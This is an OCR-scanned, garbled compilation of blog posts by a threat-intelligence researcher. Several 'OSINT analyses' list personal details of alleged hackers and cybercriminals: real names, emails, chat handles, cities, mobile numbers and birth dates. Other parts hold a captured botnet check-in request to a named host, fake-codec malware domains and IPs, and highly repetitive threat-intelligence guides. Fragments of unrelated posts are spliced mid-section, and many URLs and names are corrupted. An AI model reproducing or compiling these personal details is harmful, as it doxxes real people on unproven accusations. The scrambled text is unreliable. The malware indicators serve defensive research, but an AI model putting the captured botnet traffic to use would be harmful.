This is Dancho. In this post I'll provide actionable intelligence on two individuals on the U.S 
Secret Service’s Most Wanted Cybercriminals list in particular - [2]Oleksandr Vitalyevich lere- 
menko including [3]Danil Potekhin for the purpose of assisting U.S Law Enforcement on its way 
to track down and prosecute the individuals behind these campaigns. 


In this analysis I'll offer actionable intelligence on the fact that the first individual Oleksandr 
Vitalyevich leremenko is currently running a profitable managed android malware botnet busi- 


ness using the - hxxp://agressivex.com domain for his business and is currently on the U.S 
Sanctions List as well. 


Sample personally identifiable information for Oleksandr Vitalyevich leremenko: 
Personal Web Site: hxxp://k0Ox.ru 

ICQ: 123424 

Personal Email: uaxakep@gmail.com 


Sample personal photos of Oleksandr Vitalyevich leremenko including Danil Potekhin: 
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[4] 


Sample photo showing that Oleksandr Vitalyevich leremenko is known to have been running 
a Black Energy DDoS botnet: 


\ 


POST /black_snergy_31337_/stat.php 
HTTP/1.1 

Content-Type: application/x-www- 
form-urlencoded 

User-Agent: Mozilla/4.0 (compatible; 
MSIE 6.0; Windows NT 5.1; SV1; .NET 
CLR 1.1.4322) 

Host: kOx.ru 

Content-Length: 44 

Cache-Control: no-cache 


id=xCASPER-5D225B80_ 
E8401F1Dé&build_id=6DE983 


[5] 


Sample personal photo of Danil Potekhin: 


[6] 
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Sampl,e personal Web site: hxxp://agressivex.com 


Sample personal email: potekhinl4@bk.ru 


Sample MD5 known to have participated in the campaign: 


MD5: ecb347518230e54c773646075e2cc5ea269dcf8304ad102cee4aae75524e4736 


AndroBot v1.0 - Mozilla Firefox 


€ > & | test.agressivex.com = 11Q Se v*v oe g 


Agressivex AndroBot 


Login 


Stay tuned! 


Image Courtesy of [7]VeriSign. 


1, btps://1. bp. blogspot. con/-Weleoyiin1U/YP_KiBckpol/AMAAAAAAIS®/iiivXeg3uk-Azi-KeTRaBodVr1FU3Vos0s0LcBGAs HG 
2, fipe:/ eww. noczaterv ice, gov/inveatigation/nostwanted/ieraneakd 
3, heepe://aww. socretservice. gov/investigation/nostwanted/potethin 
4. https://1.bp blogspot. con/~yhxMQSIQhSA/YP_XYVKEStI/AAMAAAAANCA/viiy_@giKLstwCL47PENQBGD0yS0HTiwOLcBCAs HG 
5, hvtps://1.bp. blogspot .con/~Msw2qExz8z¥/YP_ZiDBInbI/AAAAAAAAEk/ it VSktvvmdUOYDH7OWhxs5qUt TceBBgOL.cBCAsYG 


6. https://1.bp.blogspot . com/-7WWRzyu0pV4/YP_XYXp1FXI/AAAAAAAANtE/C-__hEHcEe8012MwXsYuZWD2X11yaWPVgCLcBGAsYHQ 
s200/POTEKHIN-200x. jpg 


7. https: //dsimg.ubm-us .net/envelope/136823/300852/1378738788_VRSN_DDoS_Malware_EMEA_WP_201305-web.pdf 
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17.8.2 Cyber Intelligence - Personal Memoir - Dancho Danchev - 2021 - Download 
Free Copy Today! (2021-08-18 20:50) 


Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
Spam Phishing and Malware Campaigns Including Botnet 
and Money Mule Recruitment Scams Traced Down to Their 


Source Including Various Underground Market Propositions 
Exposed 


https://ddanchev.blogspot.com 


Dancho Danchev 


Dear blog readers, 
I’ve decided to share with you a direct free download copy of my personal memoir circa 2021. 
Grab a copy [1]here. 


Stay tuned! 


1. https://archive.org/details/cyber-intelligence_2021081 
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17.9 September 


17.9.1 Exposing HackPhreak Hacking Group - An OSINT Analysis (2021-09-07 04:25) 


HackPhreak is a well known U.S based hacking group throughout the 90’s which is known to 
have been actively using IRC for the purpose of communicating and recruiting new members 
including its own Anti-Pedophile organization among the Internet’s first community-driven or- 
ganization to fight online child pornography launched by a popular and well-known hacking 
group including the following high-profile members of the group: 


HackPhreak Group Members Include: 


Bronc Buster, Lothos, Overdose, Truedog, x-empt, phriction, ntwakO, Gridmark, Phemetrix, 
Mnemonic, tOuchtOne, muted, espionage, mercs, kanuchsa, Morbid Angel, Lucii, optiklenz, cap 
n crunch, tip, icer, sreality, Zyklon, havoc, HyperLogik, Defiant, Duncan Silver. Slfdstrct, lothos 


Group’s founder: Charlie Wellborne - rloxley@hackphreak.org 
Personally identifiable information for Digital Ebola: 
Digital Ebola - Email: digi@legions.org 
AIM: digitalebolal 
ICQ: 70001776 
IRC: Undernet #legions, Efnet #ampedout 
MUD: sensenet.legions.org port 5555 
digi@wintermute.linux.tc 
digi@wintermute.unixgeeks.com 
Sample HackPhreak network infrastructure reconnaissance: 
http://wintermute.legions.org - 66.12.11.162 
http://neuromancer.legions.org - 66.12.11.171 
http://cyberspace7.legions.org 
http://sensenet.legions.org 
http://straylight.legions.org 
http://monkeyboxing.legions.org - 66.12.11.170 
http://boomzilla.legions.org 
Ihttp://uckydragon.legions.org - 66.12.11.172 
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http://walledcity.legions.org 
http://aleph.legions.org 
Sample Personal Emails belonging to HackPhreak members: 


digi@wintermute.linux.tc, digi@wintermute.unixgeeks.com, digi@legions.org, ks@rmci.net, 
digi@linuxpron.com, fejed@legions.org, proto@legions.org, shekk@smurfs.com, 
wak0@legions.org, super@ce.net, threx@attrition.org, phric@legions.org, fe- 
jed@legions.org, threx@attrition.org, digi@legions.org, sodium@omegaz2.net, fe- 
jed@legions.org, godess@securityflaw.com, ntwako@legions.org, anonymous@legions.org, 
phric@legions.org,, CogitoESum@yahoo.com, ddfelts@ultravision.net, gimps@legions.org, 
gridmark@legions.org, davidj@wiretapped.net, dayzee@madsekci.net, clocker@adelphia.net, 
dayzee@madseckzi.net, flutterby _2001@hotmail.com, syntech@intraworldcom.net, 
j.p@b3ss13.ant10nline.com, morbie@legions.org, prO0Of@prOOf.org, cippa@hobbiton.org, 
beowulf3@telocity.com, adonis1@videotron.ca, alkinoos@project802.net, vecna@sOftpj.org, 
cogitoesum@yahoo.com, ntwak0@safehack.com, archimedes@security-foundation.net, 
gridmark@planetmotherfucker.net, |ruben@generation.nl, | vecna@insertcoint.net, — kid- 
dish@hehe.com, blooddjinn@hotmail.com 


Sample Personal Photos belonging to HackPhreak hacking group members: 
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More fake porn video sites using similar site templates, and using the same redirection 
infrastructure : 
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17.9.2 Exposing 29A Virus Coding Group - An OSINT Analysis (2021-09-07 04:32) 


In this analysis I'll provide personally identifiable information on some of the key members of 
the infamous 29A Virus Coding Group for the purpose of assisting U.S Law Enforcement and 
the U.S Intelligence Community on its way to track down and prosecute the cybercriminals 
behind these campaigns. 

Personal email belonging to the group: 29A@sourceofkaos.com 

Group’s personal Web site: http://sourceofkaos.com/homes/29a/ 


Second group’s Web Site: http://www.29a.net/ - Email: mOn305@terra.es 


Personally identifiable information for GriYo: - Spain - Email: griyo@akrata.org - 
http://www.geocities.com/Area51/Corridor/2618 - Email: Dreamcatcher5072@aol.com 
- Email: griyo@hellsparty.com; griyo29A@hotmail.com- _http://griyo.hellsparty.com 
- Email: griyo@bi0.net -  https://twitter.com/griyo666-  http://vxug.fakedoma.in-— - 


https://www.facebook.com/pg/djgriyo 

Personal Emails belonging to 29A Team Members: 

- Jacky Qwerty - Peru - jqgwerty@cryogen.com 

- Mental Driller - Spain - mental _driller@hotmail.com 
- Reptile - Canada - bwaha@hotmail.com 
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- SoPinky - Argentina - msopinky@hotmail.com 

- Super - Spain - super 29a@mixmail.com 

- Tcp - Spain - tcp@cryogen.com 

- Vecna - Brazil - vecna@antisocial.com 

- VirusBuster - Spain - darknode@oninet.es - Email: virusouster@terra.es 
- ZOmbie - Russia - zZloebuchij _zasrakomondohooy@usa.net 

- Darkman - Denmark darkman@sourceofkaos.com 

- roy g biv - iam _rgb@hotmail.com 

Personally Identifiable Information for Benny: 


Personal Web Site: http://benny29a.cjb.net; http://benny29a.kgb.cz; 
http://www.benny29a.com 


Sample Personal Email: benny —_29a@hushmail.com; benny@post.cz; benny 
_29a@privacyx.com 


Related personal Web sites: http://benny.bloguje.cz; http://benny.hysteria.cz 

ICQ - 123122556; 156892790; UnderNet.Org server, #vir, #virus, #vxers channels 
Related personal Web sites for 29A Group Members: 

- Alcopaul/[rRIf] http://alcopaul.cjb.net; alcopaul@cannabismail.com 

- Benny/29A http://www.coderz.net/benny; benny@post.cz 


- Mental Driller/29A mental _driller@notrix.net; mental —_driller@psynet.net; mental 
_driller@hotmail.com 


- philetOast3r/[rRIf] http://www.rRIf.de philetOast3r@rRIf.de PhileTOast3r@gmx.de 


- ZeMacroKiller98 http://zemckiller98.multimania.com - http://membres.lycos.fr/zemckiller98 
zebulon@softel.fr 


- Vecna http://coderz.net/vecna 

- VirusBuster http://virustradingcenter.cjb.net 

- ZOMBIE http://zZOmbie.host.sk http://forumer.com/bsodomon 
- GriYo Spain griyo@hellsparty.com 

- Ratter Czech Republic ratter@atlas.cz 

- roy g biv iam _rgb@hotmail.com 

- VirusBuster Spain virusbuster@terra.es 

- Super 

super 29a@mixmail.com 


Sample SNA (Social Network Analysis) Graph of 29A Virus Coding Group: 
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Stay tuned! 
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17.9.3 Exposing Team Code Zero Hacking Group - An OSINT Analysis (2021-09-07 04:37) 


In this post I'll provide personally identifiable information on some of the key members of the 
Team Code Zero hacking group with the idea to assist U.S Law Enforcement and the the U.S 
Intelligence Community on its way to track down and prosecute the cybercriminals behind 
these campaigns. 


Related Zero for Owned Personal Domains and Web Sites: 
http://shOdan.org 
http://antilimit.net 
https://sinnerz.com 
https://codez.com 
Related Team Code Zero/Confidence Remains High Team Members: 
- solo 
- helix 
- XFli 
- modex 
- Shok 
- zer0x 
- Spheroid 
Related Personal Web Sites belonging to Team Code Zero Members: 
http://www.aom.co.uk/total/ 
http://www.r0ot.org/crh/ 
http://www.rootshell.com 
http://insecurity.insecurity.org/codez/ 
Related personal emails belonging to Team Code Zero Members: 
- dk@crackhouse.com 
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- dz@acheron.net 

- domains4sale@usa.net 

- zen@sekurity.org 

Related personal Web sites belonging to Team Code Zero Members: 
http://el8.netgates.co.uk 

http://www. mastaz.org/codezero/ 
http://ulticonn.dyndns.com/codezero/ 

Related personal email belonging to Team Code Zero Members: 
Darkfool 

darkfool@pancreas.com 

Related personal Web sites belonging to Team Code Zero Members: 
http://insecurity.insecurity.org/codez/ 

http://www.rOot.org 

http://www.exceed.net 

http://www. 7thsphere.com/hpvac/hacking.html 
ftp://ftp.sekurity.org/users/solo/ 

Related personal Web sites of Team Code Zero Members: 
www.d-lab.com.ar/crh/ 

www.technotronic.com/ezines/crh/ 
http://cybrids.simplenet.com/Toast/files/CRH/ 
ftp.linuxwarez.com/pub/crh/ 

ftp.sekurity.org/users/solo/ 

Related personal Web sites belonging to Team Code Zero Members: 
http://www.d-lab.com.ar/sekret/warez/ 
http://www.d-lab.com.ar/mad/ 

http://www.d-lab.com.ar/crh/ 

Sample personal photos of Team Code Zero Members: 
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Stay tuned! 


17.9.4 Exposing Bulgarian Cyber Army Hacking Group - An OSINT Analysis 
(2021-09-07 04:44) 


In this OSINT analysis I'll offer in-depth information and analysis of Bulgaria’s Bulgarian Cyber 
Army including personally identifiable information on some of the key members behind the 
group for the purpose of assisting U.S Law Enforcement and the U.S Intelligence Community 
on its way to track down and prosecute the cybercriminals behind these campaigns. 
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EvilHack -> http://www.youtube.com/user/AnonymousEvilHack/about -> http://cyber-code.tk/ 
-> BG Cyber Army -> http://www.zone-h.org/archive/notifier=Bulgarian %20Cyber %20Army 


-> https://www.facebook.com/bgcyberarmy 

Bca-group.org - Email: bca-group@mail.ru 

BG Cyber Army - Cyber Root, Cyber King, iNCUBUS, JoKeR, MoonSpire 

- [Pa3pyxA, FuckOFF, CyberKing, CyberLord] 

CyberLord: cyberlordbg@mail.ru :: [OK] 

[+] CyberKing: z3roc0O0|@mail.ru :: [OK] 

Pa3pyxA: ra3pyxa@mail.ru 

Anonymous BG’s main forum URL: http://anonbg.info 

Group member handles: rootheR _, Hades, NoTolerance, EvilHack, PsychoPatternz. 


Forum postings for ID-ed member PsychoPatternz: http://anonbg.info/member.php?34- 
PsychoPatternz 


Forum postings for ID-ed member EvilHack: http://anonbg.info/member.php?13-EvilHack 
EvilHack’s real name: Genadi 

Skype: genadi 97 

Skype: anonymous _evilhack 

City: Veliko Turnovo or Tutrakan 

Associated emails: 

clangrf@abv.bg 

genadi _100@abv.bg 

anonyops@abv.bg 

EvilHack@hmamail.com 
evilhackO0O0@gmail.com 

evilhack@bk.ru 

evil hack@abv.bg 

URL he maintains: 
https://www.facebook.com/pages/EvilHack-Programs 
http://anonymous-world.free.bg/page-8.html 
http://web-dangerous.free.bg/page-9.html 
http://evilhack-official.blogspot.com/ 
http://www.podariavam.com/user/GenadiD 
PsychoPatternz’s name: Asparuh Naydenov 
City:: Plovdiv 

Skype: asparuh1231 
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URLs he maintains: 
http://psychopatternz.blogspot.com/ 
https://www.facebook.com/hakhz/timeline 
Facebook profile: 
https://www.facebook.com/Psychopatternz 


EvilHack appears to be also a member of a newly emerged group, namely, Bulgarian Cyber 
Army. 


Connection: EvilHack -> _ http://www.youtube.com/user/AnonymousEvilHack/about -> 
http://cyber-code.tk/ -> BG Cyber Army -> http://www.zone-h.org/archive/notifier=Bulgarian 
%20Cyber %20Army 


-> https://www.facebook.com/bgcyberarmy 
Official Web site: bca-group.org - Email: bca-group@mail.ru 
Related group emails: bca-group@bk.ru; adrenalinovocs@abv.bg 
Current members: Cyber Root, Cyber King, INCUBUS, JoKeR, MoonSpire 
Ex-members: Pa3pyxA, FuckOFF, CyberKing, CyberLord 
Group members’ associated emails: 
CyberLord - cyberlordbg@mail.ru 
CyberKing - z3roc0O0|I@mail.ru 
Pa3pyxA - ra3pyxa@mail.ru 
Group’s Name: Hack3D TeaM" or "MTH Soft 
Facebook: https://www.facebook.com/hack3dteam; 
https://www.facebook.com/bgworm. info 
Vimeo account: http://vimeo.com/user16145338/videos 
Forum: http://nhakerstvo.informe.com/ 
Zone-H Archive: http://zone-h.org/archive/notifier=MaStErChO/page=1 
Hackdb Archive: http://www.hack-db.com/hacker/r0Otkit/all.htm| 
Google Plus Profile: https://plus.google.com/104878573752624522053/photos 
Group Members: r0Otkit, MaStErChO AloneWolf, Sspdf11, razora911, Metalqear 
Shout outs most commonly given to - on the basis of multiple defaced 
page assessments -MaStErHaCk, - RTFM -The Godfather-(tm)(R) PanteliX (R)(tm) - 
(tm)W!PS(tm) - Tiger(tm) - Slackera - TraferA - 3ikmy - N3xOR. 
Known group domains’ reconnaissance: 
hxxp://bgworm.com - Email: gudolik@gmail.com - name: "Mastercho 
Hoomie" same as the Google Plus account 
hxxp://bgworm.info - historical WHOIS emails: Email: nikolas47@abv.bg; 
Email: mahon-74@hotmail.com 
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Group member profile: Anton Nikolaev (MaStErChO) 
Email: ludoto 93@abv.bg - email used from the forum’s registration confirmation 
Secondary email: ludoto 93@hotmail.com - Reference: 


https://www.facebook.com/photo.php?fbid=32 7560933969442 &set=a.325721410820061.74800.12546€ 
885 &type=1 


Skype: ko.ti.puka 

Mobile: 0895373102 

Second Mobile: 0887565357 

Birth date: March 25, 1992 or 17 July, 1990 


Sample Personal Photos of Bulgarian Cyber Army Team Members: 
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Nome best-codec.v. 1 000.ex0 
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From best-codec.com 
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While Gles bom the Internet can be uoehd. the: file type can 
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porntubev20 .com 
clearpornurlssite .com 
mypornmovies .net 
getyourfreemovie .com 
tubescollection .com 
free-best-porn .com/videos/ 
pornmovieshare .com 
clipslab .com 
mybestvideosite .com 


avwav .com 


The fake codecs download locations in this campaign : 


aviutility .com 
18x-adult2008 .com 


2008x-adult-2008 .com 
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Stay tuned! 
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Hi everyone, 


| recently came across to the entire portfolio of [2]SANS Threat Intelligence Summit presen- 
tations which are currently online at YouTube and I’ve decided to take the time and effort to 
go through them and offer practical and relevant threat intelligence and OSINT advice and 
recommendations which | hope will come handy to the presenters including anyone currently 
working in the field or interested in making an impact as a threat intelligence analyst. 


[3] 


Sample presentations from the Summit include: 


- [4]JAnalyzing Chinese Information Operations with Threat Intelligence - this is a pretty infor- 
mative presentation that offers practical and relevant Information Operations advice including 
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a pretty decent case study on the topic of a high-profile information leak campaign based in 
China 


- [5]Collections and Elections: How The New York Times built an intel collections program in 
2020 - this is a pretty informative presentation that offers an in-depth and relevant advice on 
building threat intelligence capabilities in terms of building a threat intelligence team including 
a first person experience in the process of building a threat intelligence program 


- [6]Better Than Binary: Elevating State Sponsored Attribution via Spectrum of State Respon- 
sibility - this is a pretty informative presentation that offers a very good overview of various 
threat intelligence techniques including collection enrichment and actual technical collection 
advice 


What the presenters should keep in mind when doing their research and homework is to actually 
implement a threat intelligence "rock star" mentality when doing research and actually attempt 
to take a step higher in their research and make disruption and actually take both active and 
proactive measures and actions against specific cyber threat actors and adversaries. 


I’ve been recently working on several articles on the topic of threat intelligence and | came up 
with a proper article which I'll share in this post with the idea to improve my reader’s situational 
awareness on the topic eventually improving the way they work and do threat intelligence 
gathering online. 


00. The Basics of Threat Intelligence - A Novice Cyber Threat Researcher’s Guide 


In this article we'll aim to successfully provide an in-depth overview of the Threat Intelligence 
Gathering process including various methodologies for processing enriching and dissemination 
including active case studies and in-depth overview of various standards and technologies 
including an in-depth overview of various Threat Intelligence Gathering tools and techniques. 
This article aims to successfully provide readers with general and in-depth overview of the 
Threat Intelligence Gathering process including live and relevant examples including in-depth 
overview of various Threat Intelligence Gathering tools and techniques. 


This article is aiming to target a diverse set of audience including security practitioners in- 
formation security professionals threat intelligence analysts and organizations seeking an in- 
formative and educational approach further understanding the basics of threat intelligence 
including an in-depth overview of various threat intelligence methodologies and practices in- 
cluding a variety of in-depth case studies related to threat intelligence gathering including an 
in-depth discussion on various methodologies and threat intelligence gathering tools. 


Overview of Threat Intelligence 


Threat intelligence is a multi-disciplinary approach to collecting processing and disseminat- 
ing actionable threat intelligence for the purpose of ensuring that an organizations security 
defense is actively aware of threats facing its infrastructure so that an adequate and cost- 
effective strategy can be formulated to ensure the confidentiality integrity and availability of 
the information. Threat Intelligence is the process of collecting processing and disseminating 
actionable intelligence for the purpose of ensuring that an organizations infrastructure remains 
properly secured from threats facing its infrastructure. The collection phrase can be best de- 
scribed as the process of obtaining processing and analyzing actionable threat intelligence 
for the purpose of processing and disseminating the processed data. The collection phrase 
consists of actively obtaining real-time threat intelligence data for the purpose of processing 
enriching and assessing the data for the purpose of processing and disseminating the data. 
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The collection phase consists of active monitoring of sources of interest including various public 
and privately closed community sources for the purpose of establishing an active threat intelli- 
gence gathering program foundation. The collection phrase consists of assessing and selecting 
a diverse set of primary and secondary public and privately closed sources for the purpose of 
establishing a threat intelligence gathering model. The collection phase consists of assessing 
and selecting primary and secondary public and privately closed sources for the purpose of 
establishing an active threat intelligence collection model. The collection phase consists of 
assessing the primary secondary public and privately closed sources for the purpose of estab- 
lishing an active threat intelligence gathering collection model. The collection phase consists 
of assessing and selecting the primary and secondary public and privately closed sources for 
the purpose of establishing the foundations of the collection phrase. 


What analysts should keep in mind when doing threat intelligence collection including the ac- 
tual Technical Collection process in terms of obtaining access to actual raw threat intelligence 
information which includes domains URLs and MD5’s that also includes raw cybercrime forum 
information or actual copies of a cybercrime friendly forum community for the purpose of build- 
ing a capacity driven threat intelligence program in terms of profiling and applying basic cyber 
attack attribution methodologies is to have a well trained staff force which could easily and 
efficiently obtain access to both real-time current and historical threat intelligence information 
using proprietary and publicly accessible sources for the purpose of enriching the information 
and actually coming up with new and novel research and cyber attack trends analysis. 


The processing phrase consists of actively selecting processing tools and methodologies for 
the purpose of setting the foundations for a successful processing of the data. The processing 
phase consists of actively processing the threat intelligence gathering collected data for the 
purpose of establishing the foundations for a successful processing of the data. The processing 
phase consists of collecting the processed data for the purpose of establishing the foundations 
for a successful processing of the collected data for the purpose of processing and enriching the 
processed data. The processing phase consists of active collection enrichment and processing 
of the collected data for the purpose of active processing of the collected data. The processing 
phase consists of active selection of primary and secondary public and privately closed sources 
for the purpose of processing the collected data for the purpose of enriching and processing 
the collected data. The processing phase consists of active real-time aggregation of actionable 
threat intelligence data for the purpose of establishing the foundations of active processing and 
enrichment of the processed data for the purpose of processing and enriching of the processed 
data. 


What analysts should keep in mind when doing threat intelligence processing is the relevance 
and timeliness of the actual information including the quality of the source including public and 
proprietary sources where the analysts should keep in mind that a huge portion of the informa- 
tion that could properly protect an enterprise or a vendor online is already publicly accessible 
and should be properly processed including possibly enriched in terms of coming up with the 
big picture in terms of the actual information including to come up with novel and new cyber 
attack attribution research. Sticking to major threat intelligence sharing and dissemination 
standards should be crucial in terms of feeding the publicly accessible and processed informa- 
tion into a threat intelligence processing system that also includes a cyber attack attribution 
process for the purpose of coming up with new and novel research including actual cyber attack 
attribution research using a researcher’s or an organization’s own methodology. 


The dissemination phase consists of active processing and dissemination of the processed 
data for the purpose of communicating the actionable intelligence for the purpose of ensur- 
ing that an organizations defense is actively aware of the threats facing its infrastructure and 
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best-codec .com 
hq-codec .net 
mpegsystem .com 


bestsoft-ware08 .com 


The registrant and hosting provider : 


Cernel Inc, Legal Department (Ssupport@cernel.net) 
23404 W. Lyons Ave #223, Santa Clarita, Ca,91321 


US, Tel. +1.6613470577 


Historically, the same gang has been using the same hosting provider for many other 
fake codecs, which remain parked on the same netblock in a standby mode : 


Fire-ticket .com - 64.28.184.162 
Fire-codec .com - 64.28.184.163 
Light-ticket .com - 64.28.184.163 
Braketicket .com - 64.28.184.164 
Mooncodec .net - 64.28.184.164 
Light-codec .com - 64.28.184.165 
Turbo-ticket .com - 64.28.184.165 
Space-codec .com - 64.28.184.166 
Ultra-ticket .com - 64.28.184.166 
Brakecodec .com - 64.28.184.167 


Demo-ticket .com - 64.28.184.167 
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security defense mechanisms. The dissemination phase consists of active distribution of the 
processed and enriched actionable intelligence for the purpose of active dissemination of the 
processed and enriched data. The dissemination phase consists of active dissemination and 
enrichment of the processed data for the purpose of establishing the foundations of an active 
threat intelligence gathering process. The dissemination phase consists of active communica- 
tion and distribution of the processed and enriched data for the purpose of communicating the 
processed and enriched data across the organizations security defense mechanisms. 


What analysts should keep in mind when disseminating threat intelligence is to always reach 
out to the proper parties including as many sources of information as possible for the purpose 
of presenting their research and information to the security industry industry and the security 
community in an in-depth enriched and properly processed way potentially assisting the se- 
curity industry and the security community on its way to properly attribute a cyber attack or 
detect new cyber attack trends. 


Threat Intelligence Methodologies 


Numerous threat intelligence methodologies are currently available for an organization to take 
advantage of on its way to properly secure its infrastructure taking into consideration a proac- 
tive security response. Among the most common data acquisition strategies remains the active 
data acquisition through forum and communities monitoring including the active monitoring 
of private forums and communities. Carefully selecting and primary and secondary sources 
of information is crucial for maintaining the necessary situational awareness to stay ahead 
of threat facing the organizations infrastructure including the establishment of an active re- 
sponse through an active threat intelligence gathering program. Among the most common 
threat intelligence acquisition methodologies remains the active data acquisition through pri- 
mary and secondary forums and communities including the data acquisition through private 
and secondary community based type of acquisition platforms. 


Among the most common threat intelligence data acquisition strategies remains the active 
team collaboration in terms of data acquisition data processing and data dissemination for 
the purpose of establishing an active organizations security response proactively responding 
to the threats facing an organizations infrastructure. Among the most common data acquisi- 
tion strategies in terms of threat intelligence gathering methodologies remains the active en- 
richment of the sources of information to include a variety of primary and secondary sources 
including private and community based primary and secondary sources. 


Proactive Threat Intelligence Methodologies 


Anticipating the emerging threat landscape greatly ensures an organizations successful im- 
plementation of a proactive security type of defense ensuring that an organizations security 
defense remains properly protected from the threats facing its infrastructure. Properly under- 
standing the threat landscape greatly ensures that a proactive response can be properly imple- 
mented for the purpose of ensuring that an organizations security defense remains properly 
protected from the threats facing its infrastructure. Taking into consideration the data obtained 
through an active threat intelligence gathering program greatly ensures that a proactive secu- 
rity response can be adequately implemented to ensure that an organizations security defense 
remains properly protected from the threats facing its infrastructure. 


Among the most common threat acquisition tactics remains the active understanding of the 
threats facing an organizations security infrastructure to ensure that an adequate response can 
be properly implemented ensuring that an organizations defense remains properly protected 
from the threats facing its infrastructure. Among the most common threat intelligence gather- 
ing methodologies remains the active team collaboration to ensure that an active enrichment 
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process can be properly implemented further ensuring that an organizations defense can be 
properly protected from the threats facing its infrastructure. Based on the information acquired 
through an active threat intelligence gathering acquisition processing and dissemination pro- 
gram further ensuring that an organizations infrastructure can be properly protected from the 
threats facing its infrastructure. 


The Future of Threat Intelligence 


The future of threat intelligence gathering largely relies on a successful set of threat intelli- 
gence gathering methodologies active data acquisition processing and dissemination strate- 
gies including the active enrichment of the processed data for the purpose of ensuring that 
an organizations security defense remains properly in place. The future of threat intelligence 
largely relies on the successful understanding of multiple threat vectors for the purpose of es- 
tablishing an organizations security defense. Relying on a multi-tude of enrichment processes 
including the active establishment of an active threat intelligence gathering acquisition pro- 
cessing and dissemination program greatly ensures that a proactive team-oriented approach 
can be implemented to ensure that an organizations security defense remains properly pro- 
tected from the threats facing its infrastructure. 


including the following second article which I’ve been working on in terms of using OSINT in 
combination with threat intelligence to do a better research online and actually come up with 
novel and never-published research and cyber threat actor research and analysis: 


00. Basics of OSINT in the Context of Fighting Cybercrime - The Definite Beginner’s Guide 


“What use are they? They’ve got over 40,000 people over there reading newspapers.” - Presi- 
dent Nixon 


This introductory guide into the world of OSINT is part of an upcoming series of articles aiming to 
assist both novice and experienced security practitioners including analysts for the purpose of 
entering the world of OSINT for cybercrime research and aims to offer a high-profile and never- 
published before practical and relevant in today’s nation-state and rogue cyber adversaries 
Internet and cybercrime ecosystem whose purpose general overview and introductory material 
and training course material for novice beginners including advanced Internet users hackers 
security consultants analysts including researchers who are interested in exploring the world 
of OSINT (Open Source Intelligence) for the purpose of making a difference doing their work in 
a better and more efficient way including to actually be fully capable and equipped to catch 
the bad guys online including to monitor and track them down to the point of building the big 
picture of their fraudulent and rogue online activities. The course including the actual learning 
and training material is courtesy of Dancho Danchev who is considered one of the most popular 
security bloggers threat intelligence analysts and cybercrime researchers internationally and 
within the security industry. 


The primary purpose behind this guide is to summarize Dancho Danchev’s over a decade of 
active passive and active including actionable threat intelligence and OSINT research type of 
experience including cybercrime research type of experience where the ultimate goal would 
be to empower the student or the organization taking this course into better doing their online 
research work including to be fully capable of tracking down and monitoring the rogue and 
malicious online activities of the bad guys online where the ultimate goal would be to better 
position and enhance your cyber attack or malicious threat actor cyber campaign attribution 
skills ultimately improving your work activities and actually empowering you to learn how to 
do OSINT for good and most importantly to track down and monitor the bad guys. 
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Introduction 


In a world dominated by sophisticated cybercrime gangs and nation-state sponsored and toler- 
ated rogue cyber actors the use of OSINT (Open Source Intelligence) is crucial for building the 
big picture in the context of fighting cybercrime internationally including to actually "connect 
the dots" in the context of providing personally identifiable information to a closed-group and 
invite-only LE community including international Intelligence Agencies on their way to track 
down and prosecute the cybercriminals behind these campaigns. 


In this training and learning material Dancho Danchev one of the security industry’s most 
popular and high-value security blogger and cybercrime researcher will offer an in-depth peek 
inside the world of OSINT in the context of fighting cybercrime and will provide practical advice 
examples and case in particular on how he tracked down and shut down the infamous Koobface 
botnet and continued to supply never-published and released before potentially sensitive and 
classified information on new cyber threat actors which he continued to publish at his Dancho 
Danchev’s blog. 


Basics of OSINT 


OSINT in the context of fighting cybercrime can be best described as the systematic and persis- 
tent use of public information for the purpose of building a cyber threat intelligence enriched 
data sets and intelligence databases both for real-time situational awareness and historical 
OSINT preservation purposes which also include to actually "connect the dots" in cybercrime 
gang and rogue cyber actor campaigns and cyber attack type of campaigns. A general ex- 
ample would consist of obtaining a single malicious software sample and using it on a public 
sandbox to further map the infrastructure of the cybercriminal behind it potentially exposing 
the big picture behind the campaign and connecting the dots behind their infrastructure which 
would lead to a multi-tude and variety of personally identifiable information getting exposed 
which could help build a proprietary cybercrime gang activity database and actually assist LE 
in tracking down the prosecuting the cybercriminals behind these campaigns. 


"There’s no such thing as new cyber threat actors. It’s just new players adopting economic 
and marketing concepts to steal money and cause havoc online." 


The primary idea here is to locate free and public online repositories of malicious software and 
to actually obtain a sample which will be later on used in a public sandbox for the purpose of 
mapping the Internet-connected infrastructure of the cybercrime gang in question including to 
actually elabore more on the ways they attempt to monetize the access to the compromised 
host including possibly ways in which they make money including to actually find out what 
exactly are they trying to compromise. Possible examples here include VirusTotal or actually 
running a malware interception honeypot such as for instance a spam trap which would allow 
you to intercept currently circulating in the wild malare campaigns that propagate using email 
and actually analyze them in terms of connecting the dots exposing their Internet-connected in- 
frastructure and establishing the foundations for a successful career into the world of malicious 
software analysis and cybercrime research. 


"Everything that can be seen is already there". 


The next logical step would be to properly assess and analyze the recently obtained sample and 
to properly establish the foundation of a "connect the dots" culture within your organization 
where the primary goal would be to have researchers and analysts look for clues on their way 
to track down and monitor a specific campaign potentially coming up with new and novel cyber 
attack attribution research. Visualization is often the key to everything in terms of visualizing 
threats and looking for additional clues and possible cyber attack attribution clues where a 
popular visualization and threat analysis tool Known as Maltego should come into play which 
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basically offers an advanced and sophisticated way to process OSINT and cybercrime research 
and threat intelligence type of information and actually enrich it using public and proprietary 
sources of information for the purpose of establishing the big picture and actually connecting 
the dots for a specific cyber attack campaign. 


Among the first things that you should consider before beginning your career in the World 
of OSINT is that everything that you need to know about a specific online event a specific 
online campaign that also includes the activities of the bad guys online is already out there 
in the form of publicly accessible information which should be only processed and enriched 
to the point where the big picture for a specific event or a malicious online campaign should 
be established using both qualitative and quantitative methodologies that also includes the 
process of obtaining access to the actual technical details and information behind a specific 
online event or an actual malicious and rogue online campaign. 


Among the few key things to keep in mind when doing OSINT including actual OSINT for cyber 
attack and cyber campaign attack attribution is the fact that in 99 % of the cases all the col- 
lection information that you need in terms of a specific case is already publicly known and is 
publicly accessible instead of having to obtain access to a private or a proprietary source of 
information and the only thing that you would have to do to obtain access to it is to use the 
World’s most popular search engine in terms of collection processing and enrichment. 


The second most popular thing to keep in mind when doing OSINT is that you don’t need to 
obtain access to proprietary even public OSINT tools. 


Current State of the Cybercrime Ecosystem 


In 2021 a huge number of the threats facing the security industry including vendors and orga- 
